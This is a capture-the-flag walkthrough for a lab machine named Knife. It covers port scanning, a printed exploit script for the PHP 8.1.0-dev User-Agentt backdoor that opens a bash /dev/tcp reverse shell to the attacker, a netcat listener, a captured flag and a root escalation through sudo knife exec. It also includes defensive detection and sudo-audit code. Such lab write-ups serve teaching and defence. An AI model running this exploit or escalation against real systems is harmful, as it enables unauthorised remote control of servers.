```
❯ nmap -p- --open -sS -T4 -n -Pn 10.10.10.242 -oN First_Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-14 19:29 EDT
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.95% done; ETC: 19:30 (0:00:03 remaining)
Nmap scan report for 10.10.10.242
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```
Now we run a script and version scan against the open ports:
```
❯ nmap -p80,22 -sVC -sS -T4 -n -Pn 10.10.10.242 -oN sVC_Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-14 19:32 EDT
Nmap scan report for 10.10.10.242
Host is up (0.14s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
We check what is running on port 80:
We see it is an Apache server whose response headers advertise PHP 8.1.0-dev.
We enumerate web directories with Gobuster but find nothing:
```
❯ gobuster dir -u "http://10.10.10.242/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://10.10.10.242/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
Starting gobuster in directory enumeration mode
```
We search for exploits for PHP 8.1.0-dev and find one in particular. Looking at the exploit author's profile, we find on their GitHub a Python script that obtains a reverse shell directly, so we download that as well:
```python
#!/usr/bin/env python3
"""
Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
Date: 23 may 2021
Exploit Author: flast101
Vendor Homepage: https://www.php.net/
Software Link:
- https://hub.docker.com/r/phpdaily/php
- https://github.com/phpdaily/php
Version: 8.1.0-dev
Tested on: Ubuntu 20.04
CVE : N/A
References:
- https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
- https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021,
but the backdoor was quickly discovered and removed. If this version of PHP runs on a server,
an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell on the host.

Usage:
python3 revshell_php_8.1.0-dev.py
"""
import os, sys, argparse, requests

request = requests.Session()


def check_target(args):
    # Fingerprint: the backdoored build advertises itself as PHP/8.1.0-dev in a response header
    response = request.get(args.url)
    for header in response.headers.items():
        if "PHP/8.1.0-dev" in header[1]:
            return True
    return False


def reverse_shell(args):
    # The backdoor evaluates the "User-Agentt" header value when it starts with "zerodium"
    payload = 'bash -c "bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1"'
    injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects=False)


def main():
    parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp ")
    parser.add_argument("url", metavar='', help="Target URL")
    parser.add_argument("lhost", metavar='', help="Attacker listening IP")
    parser.add_argument("lport", metavar='', help="Attacker listening port")
    args = parser.parse_args()
    if check_target(args):
        reverse_shell(args)
    else:
        print("Host is not available or vulnerable, aborting...")
        sys.exit(1)


if __name__ == "__main__":
    main()
```
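From the defender's side, the two facts the exploit header above gives us are enough to write a detector: a legitimate client never sends a header named `User-Agentt`, and the backdoor only fires when that header's value starts with `zerodium`. The following Python is an added example (not part of this writeup and not flast101's script) that parses raw HTTP requests the way a reverse proxy or WAF audit log would record them and flags both the misspelled header and the trigger marker; a second function does the inventory check for servers still advertising the `PHP/8.1.0-dev` banner. The sample requests are constructed here, not captured from the box.

```python
from typing import Dict, List, Tuple

# Indicators taken from the backdoor description: a header named "User-Agentt"
# whose value begins with "zerodium", and the build banner "PHP/8.1.0-dev".
TRIGGER_HEADER = "user-agentt"
TRIGGER_PREFIX = "zerodium"
BACKDOORED_BANNER = "PHP/8.1.0-dev"


def parse_headers(raw_request: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP request into its request line and a header dict.
    Header names are lower-cased so 'User-Agentt' and 'user-agentt' compare equal."""
    lines = raw_request.strip("\r\n").split("\n")
    request_line = lines[0].strip()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        line = line.rstrip("\r")
        if not line:
            break  # blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def classify_request(raw_request: str) -> Dict[str, object]:
    """Flag the misspelled header on its own (SUSPECT) and the full trigger (ALERT)."""
    request_line, headers = parse_headers(raw_request)
    ua_t = headers.get(TRIGGER_HEADER)
    trigger = ua_t is not None and ua_t.lower().startswith(TRIGGER_PREFIX)
    return {
        "request_line": request_line,
        "typo_header": ua_t is not None,          # header name alone is already abnormal
        "backdoor_trigger": trigger,              # marker present: code would be evaluated
        "payload": ua_t[len(TRIGGER_PREFIX):] if trigger else None,  # what was injected
    }


def server_is_backdoored_build(response_headers: Dict[str, str]) -> bool:
    """Inventory check: does any response header advertise the affected dev build?"""
    return any(BACKDOORED_BANNER in value for value in response_headers.values())


def scan(requests_raw: List[str]) -> List[Dict[str, object]]:
    return [classify_request(raw) for raw in requests_raw]


# Constructed sample traffic: one benign request, one trigger, one stray header without marker
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agentt: curl/8.0\r\n\r\n",
]

if __name__ == "__main__":
    for result in scan(SAMPLE_REQUESTS):
        level = "ALERT" if result["backdoor_trigger"] else ("SUSPECT" if result["typo_header"] else "ok")
        print(f"{level:7} {result['request_line']} payload={result['payload']!r}")
    print("dev build advertised:", server_is_backdoored_build({"X-Powered-By": "PHP/8.1.0-dev"}))
```

Because the header name itself is the high-signal indicator, a proxy rule that drops any request carrying `User-Agentt` catches the attack regardless of payload; the real fix, of course, is never to run a development build of PHP on a reachable host.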
We run the script and start a listener:
```
❯ python3 revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.51 443

❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.51] from (UNKNOWN) [10.10.10.242] 42898
bash: cannot set terminal process group (989): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$
```
We have the reverse shell and we are in; now we grab the first flag:
```
james@knife:/$ cd /home
james@knife:/home$ cd james
james@knife:~$ cat user.txt
bfdda457427a526151f71c62184a9321
```
We will try to escalate privileges, first listing our id and our sudo permissions:
```
james@knife:~$ id
uid=1000(james) gid=1000(james) groups=1000(james)
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
```
We see that we can run /usr/bin/knife as root without a password. This binary can spawn an interactive shell through the one-liner sudo knife exec -E 'exec "/bin/sh"', so we run it:
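The root cause here is a sudoers grant, not a bug in knife: any NOPASSWD rule for a command that can evaluate code (knife's exec subcommand, as shown above) is a root shell in disguise. As an added example, not part of this writeup, the following Python parses `sudo -l` output into structured rules and reports the two properties an auditor would flag for this box. The SHELL_CAPABLE set is an assumption seeded with the one binary the page shows; extend it with your own inventory. The sample input is copied from the `sudo -l` output above.

```python
import os
import re
from dataclasses import dataclass
from typing import List

# Commands that can evaluate arbitrary code for the caller. The page shows
# knife's 'exec' subcommand doing exactly that; the set is an assumption to
# extend with whatever your own sudoers grants (interpreters, editors, ...).
SHELL_CAPABLE = {"knife"}

# One rule line as 'sudo -l' prints it: "(runas) TAG: TAG: cmd, cmd"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


@dataclass
class SudoRule:
    runas: str      # user the command runs as ("root", "ALL", ...)
    nopasswd: bool  # True when sudo asks for no password
    command: str    # one command path; a comma-separated line yields several rules


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Turn the rule lines of 'sudo -l' output into SudoRule objects.
    Defaults lines and headers never start with '(' and are skipped."""
    rules: List[SudoRule] = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(root : root)" -> "root"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                rules.append(SudoRule(runas, nopasswd, cmd.strip()))
    return rules


def audit(rules: List[SudoRule]) -> List[str]:
    """Return one finding per risky property of each rule."""
    findings: List[str] = []
    for rule in rules:
        name = os.path.basename(rule.command)
        if rule.runas in ("root", "ALL") and rule.nopasswd:
            findings.append(f"{rule.command}: runs as root with NOPASSWD, so a compromised "
                            f"user account is root without any further check")
        if name in SHELL_CAPABLE:
            findings.append(f"{rule.command}: can evaluate arbitrary code (knife exec), "
                            f"so this grant is equivalent to a root shell")
    return findings


# Copied from the 'sudo -l' output shown above on this page
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print("FINDING:", finding)
```

Sudoers cannot restrict knife to harmless subcommands, so the remediation is to remove the grant (or wrap the one knife operation the user actually needs in a fixed script and grant that instead), and to log sudo invocations of code-evaluating tools for review.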